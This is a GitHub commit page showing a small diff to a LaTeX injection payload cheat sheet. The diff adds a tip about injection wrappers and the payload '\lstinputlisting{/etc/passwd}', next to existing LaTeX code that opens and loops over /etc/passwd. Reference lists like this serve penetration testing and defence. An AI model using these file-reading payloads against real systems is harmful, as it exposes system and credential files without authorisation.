Skip to content

Commit

Permalink
Merge pull request swisskyrepo#652 from clem9669/master
Browse files Browse the repository at this point in the history
Update README.md for Latex injection
  • Loading branch information
swisskyrepo committed Jun 29, 2023
2 parents f723ef4 + fa3cf25 commit 0a75bee
Showing 1 changed file with 3 additions and 0 deletions.
3 changes: 3 additions & 0 deletions LaTeX Injection/README.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,7 @@
# LaTex Injection

You might need to adjust injection with wrappers as `\[` or `$`.

## Read file

Read file and interpret the LaTeX code in it:
Expand All @@ -22,6 +24,7 @@ Read single lined file:
Read multiple lined file:

```tex
\lstinputlisting{/etc/passwd}
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
Expand Down

0 comments on commit 0a75bee

Please sign in to comment.